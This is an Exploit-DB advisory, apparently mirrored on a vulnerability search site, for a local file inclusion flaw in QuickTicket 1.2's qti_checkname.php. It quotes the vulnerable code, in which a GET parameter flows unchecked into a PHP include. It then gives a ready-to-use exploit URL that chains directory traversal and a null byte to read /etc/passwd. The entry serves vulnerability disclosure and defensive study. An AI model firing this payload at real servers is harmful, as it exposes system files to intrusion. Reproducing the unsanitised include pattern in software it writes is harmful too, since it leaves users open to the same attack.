Lucene search

K
exploitdbKatatafishEDB-ID:4116
HistoryJun 27, 2007 - 12:00 a.m.

QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion

2007-06-2700:00:00
Katatafish
www.exploit-db.com
23

AI Score

7.4

Confidence

Low

###QuickTicket v1.2 Local File Inclusion###

#download: http://www.qt-cute.org/download/qti12.zip

#found by: katatafish ([email protected])

#vulncode:
 $strLang = $_GET["lang"];
 include("language/$strLang/qtf_lang_reg.inc");

#exploit:
 http://www.site.com/[path]/qti_checkname.php?lang=./../../../../../../../../../../etc/passwd%00

#thanks:str0ke

# milw0rm.com [2007-06-27]

AI Score

7.4

Confidence

Low

Related for EDB-ID:4116